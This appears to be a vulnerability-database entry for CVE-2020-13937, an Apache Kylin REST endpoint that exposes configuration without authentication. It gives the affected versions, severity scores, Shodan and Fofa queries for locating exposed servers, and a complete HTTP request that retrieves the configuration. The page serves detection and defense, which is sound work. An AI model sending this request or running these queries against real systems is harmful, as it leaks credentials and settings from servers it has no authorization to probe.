🔙 목록으로 돌아가기

CVE-2020-13937: Apache Kylin - Exposed Configuration File

TitleApache Kylin - Exposed Configuration File
Authorpikpikcu
SeverityMedium
ImpactAn attacker can gain sensitive information from the exposed configuration file, potentially leading to further attacks.
RemediationSecure the configuration file by restricting access permissions and implementing proper access controls.
CVSS Score5.3
EPSS Score0.93845
CVE IDCVE-2020-13937
CWE IDCWE-922
Shodan Queryhttp.favicon.hash:-186961397
Fofa Queryicon_hash=-186961397
Tags cve cve2020 apache vuln

🔍 Vulnerability Description

Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin’s configuration information without authentication.

🌐 HTTP Request

GET /kylin/api/admin/config HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.15
Connection: close
Accept: */*
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-13937.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-13937.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A